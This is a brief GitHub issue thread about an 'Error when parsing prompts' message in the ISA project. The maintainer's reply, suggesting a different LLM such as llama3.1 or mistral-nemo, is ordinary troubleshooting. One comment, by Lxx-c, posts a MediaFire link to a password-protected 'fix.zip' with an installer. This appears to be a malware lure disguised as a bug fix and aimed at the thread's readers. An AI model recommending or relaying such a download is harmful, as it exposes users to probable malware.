### ISSUE TITLE
Error when parsing prompts. Retry...

### ISSUE THREAD

**Issue by razvanab** [Franck-Demongin/ISA#1]
I keep getting this error when I write a prompt in the UI.
Error when parsing prompts. Retry...

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Franck-Demongin** [comment]
You can try with another LLM like llama3.1 or mistral-nemo. Sometimes LLM are unable to output well formated json rsponse.
